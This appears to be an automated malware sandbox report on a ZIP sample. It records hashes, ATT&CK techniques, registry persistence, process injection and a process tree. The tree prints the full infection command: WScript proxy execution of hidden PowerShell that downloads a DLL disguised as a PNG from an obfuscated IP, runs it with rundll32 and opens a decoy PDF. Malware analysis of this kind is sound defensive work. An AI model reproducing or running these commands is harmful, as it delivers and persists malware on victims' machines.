7c5a0ee020e8fb14be5955ee7231191b61f3e077edf638304b046f7d780663bc

Resubmissions

24/03/2023, 01:31

230324-bxwx8sdd6v 8

24/03/2023, 01:28

230324-bvm8badd4y 1

Analysis

max time kernel
137s
max time network
143s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
24/03/2023, 01:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SharonYarbrough.zip
Size

6.6MB
MD5

4a07e43c731ee54d5d657c850c922b57
SHA1

3b73fa5b9f0d161336b719daa8aca2576842c140
SHA256

7c5a0ee020e8fb14be5955ee7231191b61f3e077edf638304b046f7d780663bc
SHA512

d786e9c58d43c8d9ff40384c46da0090109cccabfab2b640f85ebe0cabe58aeab24af1dd6fcd40b3fa8add319e26cbd6ea99d86a817a3ce05d759ae8d0d8b367
SSDEEP

98304:nJYK2SkC1ZQ7H+8y7/LD0ruWjt3n0L4zIL5rLfVfwsyIhr3AOABrNcMusgyy+zU7:nJVHKa37Pujt3n0Lx1n2syIWRGMcKV1C

Score

8^/10

persistence

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
81	2024	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	WScript.exe

Loads dropped DLL 1 IoCs

pid	Process
1096	rundll32.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\RtkAudUService = "C:\\Windows\\System32\\rundll32.exe C:\\Users\\Public\\WATPCSP.dll,Entry"	rundll32.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1096 set thread context of 2080	1096	rundll32.exe	102

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3380	2080	WerFault.exe	102

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 25 IoCs

pid	Process
2024	powershell.exe
2024	powershell.exe
2024	powershell.exe
1096	rundll32.exe
1096	rundll32.exe
1884	AcroRd32.exe
1884	AcroRd32.exe
1884	AcroRd32.exe
1884	AcroRd32.exe
1884	AcroRd32.exe
1884	AcroRd32.exe
1884	AcroRd32.exe
1884	AcroRd32.exe
1884	AcroRd32.exe
1884	AcroRd32.exe
1884	AcroRd32.exe
1884	AcroRd32.exe
1884	AcroRd32.exe
1884	AcroRd32.exe
1884	AcroRd32.exe
1884	AcroRd32.exe
1884	AcroRd32.exe
1884	AcroRd32.exe
1884	AcroRd32.exe
1884	AcroRd32.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 1 IoCs

pid	Process
1096	rundll32.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2024	powershell.exe
Token: SeDebugPrivilege	1096	rundll32.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1884	AcroRd32.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
1884	AcroRd32.exe
1884	AcroRd32.exe
1884	AcroRd32.exe
1884	AcroRd32.exe
1884	AcroRd32.exe
1884	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3340 wrote to memory of 2024	3340	WScript.exe	99
PID 3340 wrote to memory of 2024	3340	WScript.exe	99
PID 2024 wrote to memory of 1096	2024	powershell.exe	101
PID 2024 wrote to memory of 1096	2024	powershell.exe	101
PID 1096 wrote to memory of 2080	1096	rundll32.exe	102
PID 1096 wrote to memory of 2080	1096	rundll32.exe	102
PID 1096 wrote to memory of 2080	1096	rundll32.exe	102
PID 1096 wrote to memory of 2080	1096	rundll32.exe	102
PID 1096 wrote to memory of 2080	1096	rundll32.exe	102
PID 1096 wrote to memory of 2080	1096	rundll32.exe	102
PID 1096 wrote to memory of 2080	1096	rundll32.exe	102
PID 1096 wrote to memory of 2080	1096	rundll32.exe	102
PID 1096 wrote to memory of 2080	1096	rundll32.exe	102
PID 1096 wrote to memory of 2080	1096	rundll32.exe	102
PID 1096 wrote to memory of 2080	1096	rundll32.exe	102
PID 1096 wrote to memory of 2080	1096	rundll32.exe	102
PID 2024 wrote to memory of 1884	2024	powershell.exe	103
PID 2024 wrote to memory of 1884	2024	powershell.exe	103
PID 2024 wrote to memory of 1884	2024	powershell.exe	103
PID 1884 wrote to memory of 3488	1884	AcroRd32.exe	107
PID 1884 wrote to memory of 3488	1884	AcroRd32.exe	107
PID 1884 wrote to memory of 3488	1884	AcroRd32.exe	107
PID 3488 wrote to memory of 3700	3488	RdrCEF.exe	108
PID 3488 wrote to memory of 3700	3488	RdrCEF.exe	108
PID 3488 wrote to memory of 3700	3488	RdrCEF.exe	108
PID 3488 wrote to memory of 3700	3488	RdrCEF.exe	108
PID 3488 wrote to memory of 3700	3488	RdrCEF.exe	108
PID 3488 wrote to memory of 3700	3488	RdrCEF.exe	108
PID 3488 wrote to memory of 3700	3488	RdrCEF.exe	108
PID 3488 wrote to memory of 3700	3488	RdrCEF.exe	108
PID 3488 wrote to memory of 3700	3488	RdrCEF.exe	108
PID 3488 wrote to memory of 3700	3488	RdrCEF.exe	108
PID 3488 wrote to memory of 3700	3488	RdrCEF.exe	108
PID 3488 wrote to memory of 3700	3488	RdrCEF.exe	108
PID 3488 wrote to memory of 3700	3488	RdrCEF.exe	108
PID 3488 wrote to memory of 3700	3488	RdrCEF.exe	108
PID 3488 wrote to memory of 3700	3488	RdrCEF.exe	108
PID 3488 wrote to memory of 3700	3488	RdrCEF.exe	108
PID 3488 wrote to memory of 3700	3488	RdrCEF.exe	108
PID 3488 wrote to memory of 3700	3488	RdrCEF.exe	108
PID 3488 wrote to memory of 3700	3488	RdrCEF.exe	108
PID 3488 wrote to memory of 3700	3488	RdrCEF.exe	108
PID 3488 wrote to memory of 3700	3488	RdrCEF.exe	108
PID 3488 wrote to memory of 3700	3488	RdrCEF.exe	108
PID 3488 wrote to memory of 3700	3488	RdrCEF.exe	108
PID 3488 wrote to memory of 3700	3488	RdrCEF.exe	108
PID 3488 wrote to memory of 3700	3488	RdrCEF.exe	108
PID 3488 wrote to memory of 3700	3488	RdrCEF.exe	108
PID 3488 wrote to memory of 3700	3488	RdrCEF.exe	108
PID 3488 wrote to memory of 3700	3488	RdrCEF.exe	108
PID 3488 wrote to memory of 3700	3488	RdrCEF.exe	108
PID 3488 wrote to memory of 3700	3488	RdrCEF.exe	108
PID 3488 wrote to memory of 3700	3488	RdrCEF.exe	108
PID 3488 wrote to memory of 3700	3488	RdrCEF.exe	108
PID 3488 wrote to memory of 3700	3488	RdrCEF.exe	108
PID 3488 wrote to memory of 3700	3488	RdrCEF.exe	108
PID 3488 wrote to memory of 3700	3488	RdrCEF.exe	108
PID 3488 wrote to memory of 3700	3488	RdrCEF.exe	108
PID 3488 wrote to memory of 3700	3488	RdrCEF.exe	108
PID 3488 wrote to memory of 3700	3488	RdrCEF.exe	108
PID 3488 wrote to memory of 3700	3488	RdrCEF.exe	108
PID 3488 wrote to memory of 3700	3488	RdrCEF.exe	108
PID 3488 wrote to memory of 3700	3488	RdrCEF.exe	108
PID 3488 wrote to memory of 4236	3488	RdrCEF.exe	109

C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\SharonYarbrough.zip
1⤵
PID:1712

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3428

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "\\localhost\C$\Windows\System32\SyncAppvPublishingServer.vbs" n; Invoke-WebRequest http://0x6D.13561923/oy/WATPCSP.png -OutFile C:\Users\Public\WATPCSP.dll; Start-Process -FilePath C:\Windows\System32\rundll32.exe -ArgumentList C:\Users\Public\WATPCSP.dll,Entry; Invoke-WebRequest http://0x6D.13561923/oy/info.pdf -OutFile C:\Users\Public\Detailed.pdf; C:\Users\Public\Detailed.pdf
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3340
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n; Invoke-WebRequest http://0x6D.13561923/oy/WATPCSP.png -OutFile C:\Users\Public\WATPCSP.dll; Start-Process -FilePath C:\Windows\System32\rundll32.exe -ArgumentList C:\Users\Public\WATPCSP.dll,Entry; Invoke-WebRequest http://0x6D.13561923/oy/info.pdf -OutFile C:\Users\Public\Detailed.pdf; C:\Users\Public\Detailed.pdf}
  2⤵
  - Blocklisted process makes network request
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2024
- - C:\Windows\System32\rundll32.exe
    "C:\Windows\System32\rundll32.exe" C:\Users\Public\WATPCSP.dll Entry
    3⤵
    - Loads dropped DLL
    - Adds Run key to start application
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1096
  - - C:\Program Files (x86)\Internet Explorer\ielowutil.exe
      "C:\Windows\System32\rundll32.exe" C:\Users\Public\WATPCSP.dll Entry
      4⤵
      PID:2080
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 88
        5⤵
        Program crash
        
        PID:3380
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Public\Detailed.pdf"
    3⤵
    - Checks processor information in registry
    - Modifies Internet Explorer settings
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1884
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3488
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=173F2DBB61674FEE0AFD77272CE2AC62 --mojo-platform-channel-handle=1748 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        
        PID:3700
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=2C832ECB8025534A5F7BD792A3AD28F5 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=2C832ECB8025534A5F7BD792A3AD28F5 --renderer-client-id=2 --mojo-platform-channel-handle=1740 --allow-no-sandbox-job /prefetch:1
        5⤵
        
        PID:4236
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=E7530FE45B7B6BC5B601EF1DA8E4612A --mojo-platform-channel-handle=2316 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        
        PID:3704
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=68418F46481CE14B6F0C37D633F10043 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=68418F46481CE14B6F0C37D633F10043 --renderer-client-id=5 --mojo-platform-channel-handle=1756 --allow-no-sandbox-job /prefetch:1
        5⤵
        
        PID:2044
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=753B1E4D0306B3208EB8FCB68112C68C --mojo-platform-channel-handle=2320 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        
        PID:1280
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=F7327EE0C8898AE20063F56AA98CB87C --mojo-platform-channel-handle=1860 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        
        PID:1812

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 2080 -ip 2080
1⤵
PID:4108

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4900

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
36KB

MD5
b30d3becc8731792523d599d949e63f5

SHA1
19350257e42d7aee17fb3bf139a9d3adb330fad4

SHA256
b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

SHA512
523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
56KB

MD5
752a1f26b18748311b691c7d8fc20633

SHA1
c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

SHA256
111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

SHA512
a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
64KB

MD5
170c00444b2291a69b7f44869b0b898a

SHA1
9fda614a5bd490d81d9391333fd7127a6d0fe06f

SHA256
c53448be75f58fbae431169a87078548454040d7bb1bae3f885c1cbe35bdb218

SHA512
3d081faca02a299fb5498e530b63b6b69ea6113256950eb113a5a59ba3bbdb76209a3a22934c3d79f54ef2422cbe7d14e12ed4e1bc8bd2ae94bdc8269e91db5a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3xnm4f4y.zj2.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Public\Detailed.pdf

Filesize
61KB

MD5
1b6aa04252f1872fd07dfd6a5841c9da

SHA1
bac8d704d7bbc457992b1913ad3e59e90da6e912

SHA256
72958d6a6d699e95b0951c606a9a4b8b1f129461c6817d4c1e7407daaf92eb19

SHA512
d685df3297b2b229dd950080d2d18462243979b0761675e236b6205c294163f4c9830341335f4396dd36dc3c80e72a6c412a27a07d9dc69d6440bbcf3a4d50d0

Download Submit
C:\Users\Public\WATPCSP.dll

Filesize
484KB

MD5
8c0e25dbc4806171616b0b6a4281842a

SHA1
f1d5900eb6ef39b455d101be1c1525e22a6c4708

SHA256
a5ac856ce08f5526b013044067e1e74ce5aedf695a4a964025349059800ea763

SHA512
2597cdd6b5682ddc822b8c9da3a488f87ddc628c320bd013a8b2da6e360f0f851c40c688503dddf1404888a83b5512f2df023f4868d5d0cdf6ee64d20a2d1290

Download Submit
C:\Users\Public\WATPCSP.dll

Filesize
484KB

MD5
8c0e25dbc4806171616b0b6a4281842a

SHA1
f1d5900eb6ef39b455d101be1c1525e22a6c4708

SHA256
a5ac856ce08f5526b013044067e1e74ce5aedf695a4a964025349059800ea763

SHA512
2597cdd6b5682ddc822b8c9da3a488f87ddc628c320bd013a8b2da6e360f0f851c40c688503dddf1404888a83b5512f2df023f4868d5d0cdf6ee64d20a2d1290

Download Submit
memory/1096-152-0x00007FFB3B970000-0x00007FFB3BB65000-memory.dmp

Filesize
2.0MB

Download
memory/2024-147-0x00000206A0110000-0x00000206A012C000-memory.dmp

Filesize
112KB

Download
memory/2024-148-0x00000206A0130000-0x00000206A015E000-memory.dmp

Filesize
184KB

Download
memory/2024-133-0x00000206852E0000-0x0000020685302000-memory.dmp

Filesize
136KB

Download
memory/2024-158-0x0000020686F90000-0x0000020687A51000-memory.dmp

Filesize
10.8MB

Download
memory/2024-146-0x00007FFB15AB0000-0x00007FFB15B65000-memory.dmp

Filesize
724KB

Download
memory/2024-145-0x000002069FB00000-0x000002069FB10000-memory.dmp

Filesize
64KB

Download
memory/2024-144-0x000002069FB00000-0x000002069FB10000-memory.dmp

Filesize
64KB

Download
memory/2024-143-0x000002069FB00000-0x000002069FB10000-memory.dmp

Filesize
64KB

Download